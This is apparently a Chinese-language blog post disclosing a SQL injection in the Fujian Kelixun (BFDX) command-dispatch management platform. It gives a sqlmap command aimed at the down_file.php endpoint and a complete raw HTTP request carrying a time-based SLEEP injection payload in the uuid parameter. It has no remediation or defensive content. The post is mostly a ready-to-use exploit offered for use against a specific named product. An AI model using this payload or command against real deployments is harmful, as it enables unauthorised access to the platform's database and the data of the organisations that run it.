福建科立讯通信 指挥调度管理平台 SQL注入漏洞

北峰通信-福建科立讯通信 指挥调度管理平台 SQL注入漏洞

厂商域名和信息收集

域名:

工具sqlmap

python sqlmap.py -u "http://ip:端口/api/client/down_file.php?uuid=1" --batch

数据包

GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%203018%20FROM%20(SELECT(SLEEP(5)))PUiO)%20AND%20%27ayNf%27=%27ayNf HTTP/1.1

Host: ip:端口

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Connection: close

Cookie: PHPSESSID=8gnvk03ni3efhhsf6s6utobua6

Upgrade-Insecure-Requests: 1

Priority: u=0, i

相关推荐
白总Server3 分钟前
C++语法架构解说
java·网络·c++·网络协议·架构·golang·scala
敲键盘的小夜猫4 分钟前
Milvus向量Search查询综合案例实战(下)
数据库·python·milvus
安科瑞刘鸿鹏30 分钟前
破解高原运维难题:分布式光伏智能监控系统的应用研究
运维·物联网·安全
钢铁男儿1 小时前
深入剖析C#构造函数执行:基类调用、初始化顺序与访问控制
java·数据库·c#
tiantianuser1 小时前
NVMe IP现状扫盲
服务器·网络·tcp/ip
有时间要学习1 小时前
MySQL——事务
数据库·mysql
翻滚吧键盘1 小时前
Spring Boot,注解,@ComponentScan
java·数据库·spring boot
not coder1 小时前
Pytest Fixture 详解
数据库·pytest
小光学长2 小时前
基于vue框架的独居老人上门护理小程序的设计r322q(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面。
数据库
weixin_472339462 小时前
MySQL优化全链路实践:从慢查询治理到架构升级
数据库·mysql·架构